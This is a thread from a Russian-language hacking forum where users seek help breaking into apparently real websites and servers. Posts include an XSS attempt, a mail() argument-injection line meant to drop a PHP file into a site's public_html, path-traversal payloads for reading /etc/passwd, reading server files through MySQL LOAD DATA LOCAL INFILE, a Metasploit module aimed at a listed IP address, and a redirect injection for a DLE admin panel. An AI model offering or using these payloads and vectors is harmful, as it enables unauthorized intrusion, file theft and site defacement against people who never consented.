Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    Так есть же гайд по бурпу
    https://forum.antichat.ru/threads/servis-staty-po-realpazam.452520/#post-4124151
     
    Alexandr17 likes this.
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    Делаю простую XSS которая внедряется но выдает ошибку в Console
    Code:
    Uncaught ReferenceError: PROMPT is not defined
        at profile:107
     
  3. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Привычка капсом все писать? Попробуй prompt
     
    Octavian likes this.
  4. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    Да точно дело в пробеле просто думал что регистр не важен, саит сам переделол в большои регистр
     
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    У меня такои сплоит не работает https://xakep.ru/2017/01/12/phpmailer-exploit/ или в новои версии PHP исправили?
    Code:
    <?php
    mail("pes@localhost", "CheckOneTwo", "Hello!", "", "-OQueueDirectory=/tmp/ -X/home/cafeperspectiva/public_html/1.php");
    ?>
     
  6. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,115
    Likes Received:
    757
    Reputations:
    200
    который без патча PHPMailer < 5.2.18
     
    _________________________
  7. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    да но дело не в phpmailer а в функцыии mail() которую он вызывает, и 5 параметр, выходит что такои php фаил должен создать мне фаил 1.php
     
  8. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    Где у тебя? Какой MTA установлен? К примеру, postfix не поддерживает -X.

    Это не баг, это фича.
     
    BabaDook and dooble like this.
  9. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    460
    Likes Received:
    149
    Reputations:
    147
    Наткнулся на одном сервере на Apache Tomcat 8.5.23 - перед глазами страница с радостной надписью, что сервер успешно установлен.
    Доступ к
    Code:
    /manager/html
    /host-manager/html
    /manager/status
    Заблочен - я так понял по быстрому чтению доков - заблочен из коробки во имя безопасности.
    Но чутью зверя подсказывает, что нерадивый одмен забыл/забил на конфигурацию и как-то это можно раскрутить.
    Можно ли, уважаемые знатоки? Прошу вектор.
     
    #2229 r0, 6 Jan 2018
    Last edited: 6 Jan 2018
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    453
    Likes Received:
    80
    Reputations:
    20
    Получил доступ к чтению фаилов но не могу добратся до конфига Laravel, помогите приватно
     
  11. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    78
    Likes Received:
    3
    Reputations:
    0
    Товарищи, помогите пллз.
    Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки

    в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.
    как можно поискать закономерности в этом цифровом path?)
     
  12. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    site,com/download_file.php?path=../../../../../etc/passwd
    site,com/download_file.php?path=file:///etc/passwd
    site,com/download_file.php?path=http://site.ua
    site,com/download_file.php?path= итд
     
    ms13 likes this.
  13. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    78
    Likes Received:
    3
    Reputations:
    0
    ессно я сразу же это попроовал)
    я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...
     
  14. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,152
    Likes Received:
    9,318
    Reputations:
    110
    Спс, БабаДук!
    Сразу наш0л много чего интересного в практически безнадёжных вариантах!
    Плюсую
    +
     
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,023
    Likes Received:
    1,389
    Reputations:
    53
    Ксорил числа?
    алгоритм такой
     
  16. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    78
    Likes Received:
    3
    Reputations:
    0
    Товарищи, есть такой вопрос.
    Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    файлы проекта попробовать почитать, посмотреть как он с данными из бд работает
     
    _________________________
    panic.ker and ShpillyWilly like this.
  18. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    406
    Likes Received:
    37
    Reputations:
    1
    Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    406
    Likes Received:
    37
    Reputations:
    1
    ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ
    107.154.249.133 - 107.154.249.133.ip.incapdns.net
    Уязвим к exploit/multi/misc/java_rmi_server
    Но не подключится, это как пример на другом сервере 3 уязвимости
     
  20. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    256
    Likes Received:
    73
    Reputations:
    1
    Hi
    I use that in DLE admin panel but filter rejects
    <meta http-equiv="refresh" content="0;URL='http://location1.com/'">
    <script type="text/javascript">
    window.location.href='http://location2.com/';
    </script>
    what can u advice ? thanks
     
Loading...